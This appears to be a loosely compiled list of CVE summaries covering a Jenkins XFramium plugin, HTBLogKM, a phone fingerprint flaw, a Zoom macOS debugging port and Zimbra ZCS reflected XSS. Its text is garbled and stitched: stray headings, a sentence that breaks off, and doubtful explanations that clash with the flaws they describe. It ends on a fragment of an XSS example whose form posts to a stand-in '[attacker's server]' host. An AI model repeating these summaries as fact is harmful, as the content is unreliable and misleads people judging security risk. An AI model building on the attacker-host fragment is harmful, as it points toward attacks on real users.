CVE-2022-43432 Jenkins XFramium Builder Plugin 1.0.22 and earlier disables Content-Security-Policy protection for user-generated content.
This can be dangerous if, for example, you host public download sites or allow third-party code to be hosted on your servers via Git.
CVE-2021-0699 An out of bounds write in HTBLogKM could lead to local escalation of privilege in the kernel.
This issue exists because of a bug in the implementation of the bounds check. It can be exploited after gaining access to a privileged process.
CVE-2022-41595 The phones have the fingerprint vulnerability. Successful exploitation may affect the fingerprint service.
A local attacker may access and control the smartphone or read personal data from it.
Vulnerability overview
A vulnerability in the Android operating system
CVE-2022-28762 The Zoom Client for Meetings for Macs starting with 5.10.6 has a misconfiguration of a debugging port.
This could be used, for example, to launch other malware or perform other potentially unwanted actions. Zoom for meetings is a collaborative presentation and meeting
CVE-2022-41349 An attachUrl parameter in ZCS 8.8.15 is vulnerable to Reflected XSS.
The attached file must be uploaded through the administration interface. Consider the following example.
form action="http://[attacker's server]:8080/h/compose?